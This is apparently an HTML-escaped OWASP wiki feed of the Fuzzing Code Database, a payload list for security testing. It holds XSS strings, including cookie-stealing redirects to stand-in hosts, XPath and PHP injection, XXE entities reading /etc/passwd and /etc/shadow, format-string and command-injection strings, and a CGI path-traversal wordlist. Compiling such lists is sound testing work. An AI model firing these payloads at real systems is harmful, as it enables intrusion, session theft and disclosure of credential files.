&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80075</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80075"/>
				<updated>2010-03-17T21:08:33Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Vulnerable Cross-Platform CGI (17 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
